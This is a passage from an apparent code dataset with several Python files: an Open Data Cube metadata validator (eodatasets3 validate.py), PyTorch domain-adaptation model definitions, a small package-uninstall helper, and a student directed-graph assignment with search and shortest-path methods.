>>> numpy_value_fits_dtype(-3, 'uint8')\n False\n >>> numpy_value_fits_dtype(3.5, 'float32')\n True\n >>> numpy_value_fits_dtype(3.5, 'int16')\n False\n >>> numpy_value_fits_dtype(float('NaN'), 'float32')\n True\n >>> numpy_value_fits_dtype(float('NaN'), 'int32')\n False\n \"\"\"\n dtype = np.dtype(dtype)\n\n if value is None:\n value = 0\n\n if _is_nan(value):\n return np.issubdtype(dtype, np.floating)\n else:\n return np.all(np.array([value], dtype=dtype) == [value])\n\n\n@attr.s(auto_attribs=True)\nclass ExpectedMeasurement:\n name: str\n dtype: str\n nodata: int\n\n @classmethod\n def from_definition(cls, doc: Dict):\n return ExpectedMeasurement(doc[\"name\"], doc.get(\"dtype\"), doc.get(\"nodata\"))\n\n\n# Name of a field and its possible offsets in the document.\nFieldNameOffsetS = Tuple[str, Set[List[str]]]\n\n\ndef validate_paths(\n paths: List[str],\n thorough: bool = False,\n expect_extra_measurements: bool = False,\n product_definitions: Dict[str, Dict] = None,\n 
metadata_type_definitions: Dict[str, Dict] = None,\n) -> Generator[Tuple[str, List[ValidationMessage]], None, None]:\n \"\"\"Validate the list of paths. Product documents can be specified before their datasets.\"\"\"\n\n products = dict(product_definitions or {})\n metadata_types = dict(metadata_type_definitions or {})\n\n for url, doc, was_specified_by_user in read_paths(paths):\n messages = []\n kind = filename_doc_kind(url)\n if kind is None:\n kind = guess_kind_from_contents(doc)\n if kind and (kind in DOC_TYPE_SUFFIXES):\n # It looks like an ODC doc but doesn't have the standard suffix.\n messages.append(\n _warning(\n \"missing_suffix\",\n f\"Document looks like a {kind.name} but does not have \"\n f'filename extension \"{DOC_TYPE_SUFFIXES[kind]}{_readable_doc_extension(url)}\"',\n )\n )\n\n if kind == DocKind.product:\n messages.extend(validate_product(doc))\n if \"name\" in doc:\n products[doc[\"name\"]] = doc\n elif kind == DocKind.dataset:\n messages.extend(\n validate_eo3_doc(\n doc,\n url,\n products,\n metadata_types,\n thorough,\n expect_extra_measurements,\n )\n )\n elif kind == DocKind.metadata_type:\n messages.extend(validate_metadata_type(doc))\n if \"name\" in doc:\n metadata_types[doc[\"name\"]] = doc\n\n # Otherwise it's a file we don't support.\n # If the user gave us the path explicitly, it seems to be an error.\n # (if they didn't -- it was found via scanning directories -- we don't care.)\n elif was_specified_by_user:\n if kind is None:\n raise ValueError(f\"Unknown document type for {url}\")\n else:\n raise NotImplementedError(\n f\"Cannot currently validate {kind.name} files\"\n )\n else:\n # Not a doc type we recognise, and the user didn't specify it. Skip it.\n continue\n\n yield url, messages\n\n\ndef _get_field_offsets(metadata_type: Dict) -> Iterable[FieldNameOffsetS]:\n \"\"\"\n Yield all fields and their possible document-offsets that are expected for this metadata type.\n\n Eg, if the metadata type has a region_code field expected properties->region_code, this\n will yield ('region_code', {['properties', 'region_code']})\n\n (Properties can have multiple offsets, where ODC will choose the first non-null one, hence the\n return of multiple offsets for each field.)\n \"\"\"\n dataset_section = metadata_type[\"dataset\"]\n search_fields = dataset_section[\"search_fields\"]\n\n # The fixed fields of ODC. 
'id', 'label', etc.\n for field in dataset_section:\n if field == \"search_fields\":\n continue\n\n offset = dataset_section[field]\n if offset is not None:\n yield field, [offset]\n\n # The configurable search fields.\n for field, spec in search_fields.items():\n offsets = []\n if \"offset\" in spec:\n offsets.append(spec[\"offset\"])\n offsets.extend(spec.get(\"min_offset\", []))\n offsets.extend(spec.get(\"max_offset\", []))\n\n yield field, offsets\n\n\ndef _readable_doc_extension(uri: str):\n \"\"\"\n >>> _readable_doc_extension('something.json.gz')\n '.json.gz'\n >>> _readable_doc_extension('something.yaml')\n '.yaml'\n >>> _readable_doc_extension('apple.odc-metadata.yaml.gz')\n '.yaml.gz'\n >>> _readable_doc_extension('products/tmad/tmad_product.yaml#part=1')\n '.yaml'\n >>> _readable_doc_extension('/tmp/human.06.tall.yml')\n '.yml'\n >>> # Not a doc, even though it's compressed.\n >>> _readable_doc_extension('db_dump.gz')\n >>> _readable_doc_extension('/tmp/nothing')\n \"\"\"\n path = urlparse(uri).path\n compression_formats = (\".gz\",)\n doc_formats = (\n \".yaml\",\n \".yml\",\n \".json\",\n )\n suffix = \"\".join(\n s.lower()\n for s in Path(path).suffixes\n if s.lower() in doc_formats + compression_formats\n )\n # If it's only compression, no doc format, it's not valid.\n if suffix in compression_formats:\n return None\n return suffix or None\n\n\ndef read_paths(\n input_paths: Iterable[str],\n) -> Generator[Tuple[str, Union[Dict, str], bool], None, None]:\n \"\"\"\n Read the given input paths, returning a URL, document, and whether\n it was explicitly given by the user.\n\n When a local directory is specified, inner readable docs are returned, but will\n be marked as not explicitly specified.\n \"\"\"\n for input_ in input_paths:\n for uri, was_specified in expand_paths_as_uris([input_]):\n try:\n for full_uri, doc in read_documents(uri, uri=True):\n yield full_uri, doc, was_specified\n except InvalidDocException as e:\n if was_specified:\n raise\n else:\n echo(e, err=True)\n\n\ndef expand_paths_as_uris(\n input_paths: Iterable[str],\n) -> Generator[Tuple[Path, bool], None, None]:\n \"\"\"\n For any paths that are directories, find inner documents that are known.\n\n Returns Tuples: path as a URL, and whether it was specified explicitly by user.\n \"\"\"\n for input_ in input_paths:\n if is_url(input_):\n yield input_, True\n else:\n path = Path(input_).resolve()\n if path.is_dir():\n for found_path in path.rglob(\"*\"):\n if _readable_doc_extension(found_path.as_uri()) is not None:\n yield found_path.as_uri(), False\n else:\n yield path.as_uri(), True\n\n\ndef validate_eo3_doc(\n doc: Dict,\n location: Union[str, Path],\n products: Dict[str, Dict],\n metadata_types: Dict[str, Dict],\n thorough: bool = False,\n expect_extra_measurements=False,\n) -> List[ValidationMessage]:\n messages = []\n\n # TODO: follow ODC's match rules?\n\n matched_product = None\n\n if products:\n matched_product, messages = _match_product(doc, products)\n else:\n messages.append(\n ValidationMessage(\n Level.error if thorough else Level.info,\n \"no_product\",\n \"No product provided: validating dataset information alone\",\n )\n )\n\n metadata_type = None\n if metadata_types and matched_product:\n metadata_type = matched_product[\"metadata_type\"]\n if metadata_type not in metadata_types:\n messages.append(\n ValidationMessage(\n Level.error if thorough else Level.info,\n \"no_metadata_type\",\n f\"Metadata type not provided {metadata_type}: not validating fields\",\n )\n )\n\n messages.extend(\n 
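    # --- Added illustration (hypothetical metadata type) of what this
    # function yields; each offset is a list of document keys:
    #   _get_field_offsets({
    #       "dataset": {
    #           "id": ["id"],
    #           "search_fields": {
    #               "region_code": {"offset": ["properties", "odc:region_code"]},
    #           },
    #       }
    #   })
    #   -> ('id', [['id']])
    #   -> ('region_code', [['properties', 'odc:region_code']])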
validate_dataset(\n doc,\n product_definition=matched_product,\n readable_location=location,\n thorough=thorough,\n metadata_type_definition=metadata_types.get(metadata_type),\n expect_extra_measurements=expect_extra_measurements,\n )\n )\n return messages\n\n\ndef _get_printable_differences(dict1: Dict, dict2: Dict):\n \"\"\"\n Get a series of lines to print that show the reason that dict1 is not a superset of dict2\n \"\"\"\n dict1 = dict(utils.flatten_dict(dict1))\n dict2 = dict(utils.flatten_dict(dict2))\n\n for path in dict2.keys():\n v1, v2 = dict1.get(path), dict2.get(path)\n if v1 != v2:\n yield f\"{path}: {v1!r} != {v2!r}\"\n\n\ndef _get_product_mismatch_reasons(dataset_doc: Dict, product_definition: Dict):\n \"\"\"\n Which fields don't match the given dataset doc to a product definition?\n\n Gives human-readable lines of text.\n \"\"\"\n yield from _get_printable_differences(dataset_doc, product_definition[\"metadata\"])\n\n\ndef _match_product(\n dataset_doc: Dict, product_definitions: Dict[str, Dict]\n) -> Tuple[Optional[Dict], List[ValidationMessage]]:\n \"\"\"Match the given dataset to a product definition\"\"\"\n\n product = None\n\n # EO3 datasets often put the product name directly inside.\n specified_product_name = get_path(dataset_doc, (\"product\", \"name\"), default=None)\n specified_product_name = specified_product_name or get_path(\n dataset_doc, (\"properties\", \"odc:product\"), default=None\n )\n\n if specified_product_name and (specified_product_name in product_definitions):\n product = product_definitions[specified_product_name]\n\n matching_products = {\n name: definition\n for name, definition in product_definitions.items()\n if changes.contains(dataset_doc, definition[\"metadata\"])\n }\n\n # We we have nothing, give up!\n if (not matching_products) and (not product):\n\n # Find the product that most closely matches it, to helpfully show the differences!\n closest_product_name = None\n closest_differences = None\n for name, definition in product_definitions.items():\n diffs = tuple(_get_product_mismatch_reasons(dataset_doc, definition))\n if (closest_differences is None) or len(diffs) < len(closest_differences):\n closest_product_name = name\n closest_differences = diffs\n\n difference_hint = _differences_as_hint(closest_differences)\n return None, [\n _error(\n \"unknown_product\",\n \"Dataset does not match the given products\",\n hint=f\"Closest match is {closest_product_name}, with differences:\"\n f\"\\n{difference_hint}\",\n )\n ]\n\n messages = []\n\n if specified_product_name not in matching_products:\n if product:\n difference_hint = _differences_as_hint(\n _get_product_mismatch_reasons(dataset_doc, product)\n )\n messages.append(\n _info(\n \"strange_product_claim\",\n f\"Dataset claims to be product {specified_product_name!r}, but doesn't match its fields\",\n hint=f\"{difference_hint}\",\n )\n )\n else:\n messages.append(\n _info(\n \"unknown_product_claim\",\n f\"Dataset claims to be product {specified_product_name!r}, but it wasn't supplied.\",\n )\n )\n\n if len(matching_products) > 1:\n matching_names = \", \".join(matching_products.keys())\n messages.append(\n _error(\n \"product_match_clash\",\n \"Multiple products match the given dataset\",\n hint=f\"Maybe you need more fields in the 'metadata' section?\\n\"\n f\"Claims to be a {specified_product_name!r}, and matches {matching_names!r}\"\n if specified_product_name\n else f\"Maybe you need more fields in the 'metadata' section?\\n\"\n f\"Matches {matching_names!r}\",\n )\n )\n # (We wont 
pick one from the bunch here. Maybe they already matched one above to use in continuing validation.)\n\n # Just like ODC, match rules will rule all. Even if their metadata has a \"product_name\" field.\n if len(matching_products) == 1:\n [product] = matching_products.values()\n\n return product, messages\n\n\ndef _differences_as_hint(product_diffs):\n return indent(\"\\n\".join(product_diffs), prefix=\"\\t\")\n\n\ndef _validate_stac_properties(dataset: DatasetDoc):\n for name, value in dataset.properties.items():\n if name not in dataset.properties.KNOWN_PROPERTIES:\n yield _warning(\"unknown_property\", f\"Unknown stac property {name!r}\")\n\n else:\n normaliser = dataset.properties.KNOWN_PROPERTIES.get(name)\n if normaliser and value is not None:\n try:\n normalised_value = normaliser(value)\n # A normaliser can return two values, the latter adding extra extracted fields.\n if isinstance(normalised_value, tuple):\n normalised_value = normalised_value[0]\n\n # It's okay for datetimes to be strings\n # .. since ODC's own loader does that.\n if isinstance(normalised_value, datetime) and isinstance(\n value, str\n ):\n value = ciso8601.parse_datetime(value)\n\n # Special case for dates, as \"no timezone\" and \"utc timezone\" are treated identical.\n if isinstance(value, datetime):\n value = default_utc(value)\n\n if not isinstance(value, type(normalised_value)):\n yield _warning(\n \"property_type\",\n f\"Value {value} expected to be \"\n f\"{type(normalised_value).__name__!r} (got {type(value).__name__!r})\",\n )\n elif normalised_value != value:\n if _is_nan(normalised_value) and _is_nan(value):\n # Both are NaNs, ignore.\n pass\n else:\n yield _warning(\n \"property_formatting\",\n f\"Property {value!r} expected to be {normalised_value!r}\",\n )\n except ValueError as e:\n yield _error(\"invalid_property\", f\"{name!r}: {e.args[0]}\")\n\n if \"odc:producer\" in dataset.properties:\n producer = dataset.properties[\"odc:producer\"]\n # We use domain name to avoid arguing about naming conventions ('ga' vs 'geoscience-australia' vs ...)\n if \".\" not in producer:\n yield _warning(\n \"producer_domain\",\n \"Property 'odc:producer' should be the organisation's domain name. Eg. 
'ga.gov.au'\",\n )\n\n # This field is a little odd, but is expected by the current version of ODC.\n # (from discussion with Kirill)\n if not dataset.properties.get(\"odc:file_format\"):\n yield _warning(\n \"global_file_format\",\n \"Property 'odc:file_format' is empty\",\n hint=\"Usually 'GeoTIFF'\",\n )\n\n\ndef _is_nan(v):\n # Due to JSON serialisation, nan can also be represented as a string 'NaN'\n if isinstance(v, str):\n return v == \"NaN\"\n return isinstance(v, float) and math.isnan(v)\n\n\ndef _validate_geo(dataset: DatasetDoc, expect_geometry: bool = True):\n has_some_geo = _has_some_geo(dataset)\n if not has_some_geo and expect_geometry:\n yield _info(\"non_geo\", \"No geo information in dataset\")\n return\n\n if dataset.geometry is None:\n if expect_geometry:\n yield _info(\"incomplete_geo\", \"Dataset has some geo fields but no geometry\")\n elif not dataset.geometry.is_valid:\n yield _error(\n \"invalid_geometry\",\n f\"Geometry is not a valid shape: {explain_validity(dataset.geometry)!r}\",\n )\n\n # TODO: maybe we'll allow no grids: backwards compat with old metadata.\n if not dataset.grids:\n yield _error(\"incomplete_grids\", \"Dataset has some geo fields but no grids\")\n\n if not dataset.crs:\n yield _error(\"incomplete_crs\", \"Dataset has some geo fields but no crs\")\n else:\n # We only officially support epsg code (recommended) or wkt.\n if dataset.crs.lower().startswith(\"epsg:\"):\n try:\n CRS.from_string(dataset.crs)\n except CRSError as e:\n yield _error(\"invalid_crs_epsg\", e.args[0])\n\n if dataset.crs.lower() != dataset.crs:\n yield _warning(\"mixed_crs_case\", \"Recommend lowercase 'epsg:' prefix\")\n else:\n wkt_crs = None\n try:\n wkt_crs = CRS.from_wkt(dataset.crs)\n except CRSError as e:\n yield _error(\n \"invalid_crs\",\n f\"Expect either an epsg code or a WKT string: {e.args[0]}\",\n )\n\n if wkt_crs and wkt_crs.is_epsg_code:\n yield _warning(\n \"non_epsg\",\n f\"Prefer an EPSG code to a WKT when possible. 
(Can change CRS to 'epsg:{wkt_crs.to_epsg()}')\",\n )\n\n\ndef _has_some_geo(dataset):\n return dataset.geometry is not None or dataset.grids or dataset.crs\n\n\ndef display_result_console(\n url: str, is_valid: bool, messages: List[ValidationMessage], quiet=False\n):\n \"\"\"\n Print validation messages to the Console (using colour if available).\n \"\"\"\n # Otherwise console output, with color if possible.\n if messages or not quiet:\n echo(f\"{bool_style(is_valid)} {url}\")\n\n for message in messages:\n hint = \"\"\n if message.hint:\n # Indent the hint if it's multi-line.\n if \"\\n\" in message.hint:\n hint = \"\\t\\tHint:\\n\"\n hint += indent(message.hint, \"\\t\\t\" + (\" \" * 5))\n else:\n hint = f\"\\t\\t(Hint: {message.hint})\"\n s = {\n Level.info: dict(),\n Level.warning: dict(fg=\"yellow\"),\n Level.error: dict(fg=\"red\"),\n }\n displayable_code = style(f\"{message.code}\", **s[message.level], bold=True)\n echo(f\"\\t{message.level.name[0].upper()} {displayable_code} {message.reason}\")\n if hint:\n echo(hint)\n\n\ndef display_result_github(url: str, is_valid: bool, messages: List[ValidationMessage]):\n \"\"\"\n Print validation messages using Github Action's command language for warnings/errors.\n \"\"\"\n echo(f\"{bool_style(is_valid)} {url}\")\n for message in messages:\n hint = \"\"\n if message.hint:\n # Indent the hint if it's multi-line.\n if \"\\n\" in message.hint:\n hint = \"\\n\\nHint:\\n\"\n hint += indent(message.hint, (\" \" * 5))\n else:\n hint = f\"\\n\\n(Hint: {message.hint})\"\n\n if message.level == Level.error:\n code = \"::error\"\n else:\n code = \"::warning\"\n\n text = f\"{message.reason}{hint}\"\n\n # URL-Encode any newlines\n text = text.replace(\"\\n\", \"%0A\")\n # TODO: Get the real line numbers?\n echo(f\"{code} file={url},line=1::{text}\")\n\n\n_OUTPUT_WRITERS = dict(\n plain=display_result_console,\n quiet=partial(display_result_console, quiet=True),\n github=display_result_github,\n)\n\n\n@click.command(\n help=__doc__\n + \"\"\"\nPaths can be products, dataset documents, or directories to scan (for files matching\nnames '*.odc-metadata.yaml' etc), either local or URLs.\n\nDatasets are validated against matching products that have been scanned already, so specify\nproducts first, and datasets later, to ensure they can be matched.\n\"\"\"\n)\n@click.version_option()\n@click.argument(\"paths\", nargs=-1)\n@click.option(\n \"--warnings-as-errors\",\n \"-W\",\n \"strict_warnings\",\n is_flag=True,\n help=\"Fail if any warnings are produced\",\n)\n@click.option(\n \"-f\",\n \"--output-format\",\n help=\"Output format\",\n type=click.Choice(list(_OUTPUT_WRITERS)),\n # Are we in Github Actions?\n # Send any warnings/errors in its custom format\n default=\"github\" if \"GITHUB_ACTIONS\" in os.environ else \"plain\",\n show_default=True,\n)\n@click.option(\n \"--thorough\",\n is_flag=True,\n help=\"Attempt to read the data/measurements, and check their properties match\",\n)\n@click.option(\n \"--expect-extra-measurements/--warn-extra-measurements\",\n is_flag=True,\n default=False,\n help=\"Allow some dataset measurements to be missing from the product definition. \"\n \"This is (deliberately) allowed by ODC, but often a mistake. This flag disables the warning.\",\n)\n@click.option(\n \"--explorer-url\",\n \"explorer_url\",\n help=\"Use product definitions from the given Explorer URL to validate datasets. 
\"\n 'Eg: \"https://explorer.dea.ga.gov.au/\"',\n)\n@click.option(\n \"--odc\",\n \"use_datacube\",\n is_flag=True,\n help=\"Use product definitions from datacube to validate datasets\",\n)\n@click.option(\n \"-q\",\n \"--quiet\",\n is_flag=True,\n default=False,\n help=\"Only print problems, one per line\",\n)\ndef run(\n paths: List[str],\n strict_warnings,\n quiet,\n thorough: bool,\n expect_extra_measurements: bool,\n explorer_url: str,\n use_datacube: bool,\n output_format: str,\n):\n validation_counts: Counter[Level] = collections.Counter()\n invalid_paths = 0\n current_location = Path(\".\").resolve().as_uri() + \"/\"\n\n product_definitions = _load_remote_product_definitions(use_datacube, explorer_url)\n\n if output_format == \"plain\" and quiet:\n output_format = \"quiet\"\n write_file_report = _OUTPUT_WRITERS[output_format]\n\n for url, messages in validate_paths(\n paths,\n thorough=thorough,\n expect_extra_measurements=expect_extra_measurements,\n product_definitions=product_definitions,\n ):\n if url.startswith(current_location):\n url = url[len(current_location) :]\n\n levels = collections.Counter(m.level for m in messages)\n is_invalid = levels[Level.error] > 0\n if strict_warnings:\n is_invalid |= levels[Level.warning] > 0\n\n if quiet:\n # Errors/Warnings only. Remove info-level.\n messages = [m for m in messages if m.level != Level.info]\n\n if is_invalid:\n invalid_paths += 1\n\n for message in messages:\n validation_counts[message.level] += 1\n\n write_file_report(\n url=url,\n is_valid=not is_invalid,\n messages=messages,\n )\n\n # Print a summary on stderr for humans.\n if not quiet:\n result = (\n style(\"failure\", fg=\"red\", bold=True)\n if invalid_paths > 0\n else style(\"valid\", fg=\"green\", bold=True)\n )\n secho(f\"\\n{result}: \", nl=False, err=True)\n if validation_counts:\n echo(\n \", \".join(\n f\"{v} {k.name}{'s' if v > 1 else ''}\"\n for k, v in validation_counts.items()\n ),\n err=True,\n )\n else:\n secho(f\"{len(paths)} paths\", err=True)\n\n sys.exit(invalid_paths)\n\n\ndef _load_remote_product_definitions(\n from_datacube: bool = False,\n from_explorer_url: Optional[str] = None,\n) -> Dict[str, Dict]:\n\n product_definitions = {}\n # Load any remote products that were asked for.\n if from_explorer_url:\n for definition in _load_explorer_product_definitions(from_explorer_url):\n product_definitions[definition[\"name\"]] = definition\n secho(f\"{len(product_definitions)} Explorer products\", err=True)\n\n if from_datacube:\n # The normal datacube environment variables can be used to choose alternative configs.\n with Datacube(app=\"eo3-validate\") as dc:\n for product in dc.index.products.get_all():\n product_definitions[product.name] = product.definition\n\n secho(f\"{len(product_definitions)} ODC products\", err=True)\n return product_definitions\n\n\ndef _load_doc(url):\n return list(load_documents(url))\n\n\ndef _load_explorer_product_definitions(\n explorer_url: str,\n workers: int = 6,\n) -> Generator[Dict, None, None]:\n \"\"\"\n Read all product yamls from the given Explorer instance,\n\n eg: https://explorer.dea.ga.gov.au/products/ls5_fc_albers.odc-product.yaml\n \"\"\"\n product_urls = [\n urljoin(explorer_url, f\"/products/{name.strip()}.odc-product.yaml\")\n for name in urlopen(urljoin(explorer_url, \"products.txt\")) # nosec\n .read()\n .decode(\"utf-8\")\n .split(\"\\n\")\n ]\n count = 0\n with multiprocessing.Pool(workers) as pool:\n for product_definitions in pool.imap_unordered(_load_doc, product_urls):\n count += 1\n 
echo(f\"\\r{count} Explorer products\", nl=False)\n yield from product_definitions\n pool.close()\n pool.join()\n echo()\n","sub_path":"eodatasets3/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":43646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571128652","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Function, Variable\nfrom functions import ReverseLayerF\nimport torchvision.models as models\nclass AlexNet(nn.Module):\n def __init__(self):\n super(AlexNet, self).__init__()\n self.features = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=11, stride=4, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(64, 192, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(192, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(256, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(256 * 6 * 6, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(inplace=True),\n # nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n x = self.features(x)\n x = x.view(x.size(0), 256 * 6 * 6)\n x = self.classifier(x)\n return x\n\nalexnet = models.alexnet(pretrained=True)\n\nclass DANN(nn.Module):\n def __init__(self):\n super(DANN, self).__init__()\n self.feature = AlexNet().features\n\n self.class_classifier = nn.Sequential()\n self.class_classifier.add_module('c_fc0', nn.Linear(256 * 6 * 6, 4096))\n self.class_classifier.add_module('c_drop1', nn.Dropout2d())\n self.class_classifier.add_module('c_relu1', nn.ReLU(True))\n self.class_classifier.add_module('c_fc1', nn.Linear(4096, 65))\n\n self.domain_classifier = nn.Sequential()\n self.domain_classifier.add_module('c_fc0', nn.Linear(256 * 6 * 6, 4096))\n self.domain_classifier.add_module('d_relu1', nn.ReLU(True))\n self.domain_classifier.add_module('d_fc2', nn.Linear(4096, 2))\n \n def forward(self, input_data, alpha):\n feature = self.feature(input_data)\n print(feature.size())\n feature = feature.view(-1, 256*6*6)\n reverse_feature = ReverseLayerF.apply(feature, alpha)\n class_output = self.class_classifier(feature)\n domain_output = self.domain_classifier(reverse_feature)\n\n return class_output, domain_output\n\nclass ResNet(nn.Module):\n def __init__(self):\n super(ResNet, self).__init__()\n resnet50 = models.resnet50(pretrained=True)\n self.resnet50_features = nn.Sequential(*list(resnet50.children())[:-1])\n self.class_classifier = nn.Sequential()\n self.class_classifier.add_module('c_fc0', nn.Linear(2048, 11))\n\n\n self.domain_classifier = nn.Sequential()\n self.domain_classifier.add_module('d_fc0', nn.Linear(2048, 2))\n\n def forward(self, input_data, alpha):\n feature = self.resnet50_features(input_data)\n feature = feature.view(-1, 2048)\n reverse_feature = ReverseLayerF.apply(feature, alpha)\n class_output = self.class_classifier(feature)\n domain_output = self.domain_classifier(reverse_feature)\n\n return class_output, domain_output","sub_path":"Dark Images/DANN/Models.py","file_name":"Models.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"496264114","text":"\"\"\"\nUninstalls a package and returns a dictionary 
containing which packages\nwere uninstalled successfully or unsuccessfully.\n\"\"\"\n\nimport packaging.install\n\n\ndef uninstall(package_list):\n result = {'uninstalled': [], 'failed': []}\n\n for package in package_list:\n if packaging.install.remove(package):\n result['uninstalled'].append(package)\n else:\n result['failed'].append(package)\n\n return result\n","sub_path":"pip2/commands/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"327814309","text":"# Course: CS261 - Data Structures\n# Author:\n# Assignment:\n# Description:\n\nimport heapq\n\nclass DirectedGraph:\n \"\"\"\n Class to implement directed weighted graph\n - duplicate edges not allowed\n - loops not allowed\n - only positive edge weights\n - vertex names are integers\n \"\"\"\n\n def __init__(self, start_edges=None):\n \"\"\"\n Store graph info as adjacency matrix\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n self.v_count = 0\n self.adj_matrix = []\n\n # populate graph with initial vertices and edges (if provided)\n # before using, implement add_vertex() and add_edge() methods\n if start_edges is not None:\n v_count = 0\n for u, v, _ in start_edges:\n v_count = max(v_count, u, v)\n for _ in range(v_count + 1):\n self.add_vertex()\n for u, v, weight in start_edges:\n self.add_edge(u, v, weight)\n\n def __str__(self):\n \"\"\"\n Return content of the graph in human-readable form\n DO NOT CHANGE THIS METHOD IN ANY WAY\n \"\"\"\n if self.v_count == 0:\n return 'EMPTY GRAPH\\n'\n out = ' |'\n out += ' '.join(['{:2}'.format(i) for i in range(self.v_count)]) + '\\n'\n out += '-' * (self.v_count * 3 + 3) + '\\n'\n for i in range(self.v_count):\n row = self.adj_matrix[i]\n out += '{:2} |'.format(i)\n out += ' '.join(['{:2}'.format(w) for w in row]) + '\\n'\n out = f\"GRAPH ({self.v_count} vertices):\\n{out}\"\n return out\n\n # ------------------------------------------------------------------ #\n\n def add_vertex(self) -> int:\n \"\"\"\n This method adds a new vertex to the graph.\n \"\"\"\n self.v_count += 1\n # grow the existing matrix in place so previously added edges are kept\n for row in self.adj_matrix:\n row.append(0)\n self.adj_matrix.append([0] * self.v_count)\n return self.v_count\n\n def add_edge(self, src: int, dst: int, weight=1) -> None:\n \"\"\"\n This method adds a new edge to the graph.\n \"\"\"\n if src > self.v_count-1 or dst > self.v_count-1:\n return\n if self.adj_matrix[src] and self.adj_matrix[dst] and weight > 0 and src != dst:\n self.adj_matrix[src][dst] = weight\n\n def remove_edge(self, src: int, dst: int) -> None:\n \"\"\"\n This method removes an edge between two vertices\n \"\"\"\n if src < 0 or dst < 0:\n return\n if src > self.v_count - 1 or dst > self.v_count - 1:\n return\n if self.adj_matrix[src] and self.adj_matrix[src][dst] > 0:\n self.adj_matrix[src][dst] = 0\n\n def get_vertices(self) -> []:\n \"\"\"\n This method returns a list of vertices of the graph\n \"\"\"\n verts = []\n\n for i in range(self.v_count):\n verts.append(i)\n return verts\n\n def get_edges(self) -> []:\n \"\"\"\n This method returns a list of edges in the graph\n \"\"\"\n eds = []\n for x in range(self.v_count):\n for y in range(self.v_count):\n if self.adj_matrix[x][y] > 0:\n eds.append((x, y, self.adj_matrix[x][y]))\n return eds\n\n def is_valid_path(self, path: []) -> bool:\n \"\"\"\n Return True if the sequence of vertices is a valid path in the graph,\n i.e. an edge exists between every consecutive pair of vertices\n \"\"\"\n eds = []\n k = 0\n for x in range(self.v_count):\n for y in range(self.v_count):\n if self.adj_matrix[x][y] > 0:\n eds.append((x, 
y))\n\n while k+1 < len(path):\n if (path[k], path[k+1]) in eds:\n k += 1\n else:\n return False\n return True\n\n def dfs(self, v_start, v_end=None, visited=None) -> []:\n \"\"\"\n Return list of vertices visited during DFS search\n Vertices are picked in ascending order\n \"\"\"\n if v_end is not None:\n if not self.adj_matrix[v_start][v_end]:\n v_end = None\n\n if visited is None:\n visited = []\n\n if v_start < 0 or v_start > self.v_count -1:\n return visited\n visited.append(v_start)\n\n adj = self.adj_matrix[v_start]\n for x in range(self.v_count):\n if adj[x] > 0 and x not in visited and v_end not in visited:\n self.dfs(x, v_end, visited)\n return visited\n\n def bfs(self, v_start, v_end=None) -> []:\n \"\"\"\n Return list of vertices visited during BFS search\n Vertices are picked in ascending order\n \"\"\"\n visited = []\n queue = [v_start]\n if v_start < 0 or v_start > self.v_count - 1:\n return visited\n while queue and v_end not in visited:\n v = queue.pop(0)\n if v not in visited:\n visited.append(v)\n adj = self.adj_matrix[v]\n for x in range(self.v_count):\n if adj[x] > 0 and x not in visited and v_end not in visited:\n queue.append(x)\n return visited\n\n def has_cycle(self):\n \"\"\"\n Return True if graph contains a cycle, False otherwise\n \"\"\"\n visited = []\n stack = []\n for x in range(self.v_count):\n if x not in visited:\n if self.rec_has_cycle(x, visited, stack):\n return True\n return False\n\n def rec_has_cycle(self, v_start, visited, stack):\n \"\"\"\n Recursive helper for has_cycle()\n \"\"\"\n visited.append(v_start)\n stack.append(v_start)\n adj = self.adj_matrix[v_start]\n\n for x in range(len(adj)):\n if adj[x] > 0 and x not in visited:\n if self.rec_has_cycle(x, visited, stack):\n return True\n elif adj[x] > 0 and x in stack:\n return True\n stack.remove(v_start)\n return False\n\n def dijkstra(self, src: int) -> []:\n \"\"\"\n This method implements Dijkstra's algorithm to compute the shortest path from a given vertex to all other vertices\n in the graph.\n \"\"\"\n vertices = [x for x in range(self.v_count)]\n distance = dict(zip(vertices, [float('inf')] * len(vertices)))\n distance[src] = 0\n visited = set()\n # heap entries are (distance, vertex) so the closest unvisited vertex pops first\n priority = [(0, src)]\n while priority:\n d, v = heapq.heappop(priority)\n if v in visited:\n continue\n visited.add(v)\n successors = self.adj_matrix[v]\n for neighbor in range(len(successors)):\n if neighbor in visited or successors[neighbor] == 0:\n continue\n di = d + successors[neighbor]\n if di < distance[neighbor]:\n heapq.heappush(priority, (di, neighbor))\n distance[neighbor] = di\n verts = []\n\n for vert in sorted(distance):\n verts.append(distance[vert])\n return verts\n\nif __name__ == '__main__':\n\n print(\"\\nPDF - method add_vertex() / add_edge example 1\")\n print(\"----------------------------------------------\")\n g = DirectedGraph()\n print(g)\n for _ in range(5):\n g.add_vertex()\n print(g)\n\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), (3, 2, 7)]\n for src, dst, weight in edges:\n g.add_edge(src, dst, weight)\n print(g)\n\n\n print(\"\\nPDF - method get_edges() example 1\")\n print(\"----------------------------------\")\n g = DirectedGraph()\n print(g.get_edges(), g.get_vertices(), sep='\\n')\n edges = [(0, 1, 10), (4, 0, 12), (1, 4, 15), (4, 3, 3),\n (3, 1, 5), (2, 1, 23), 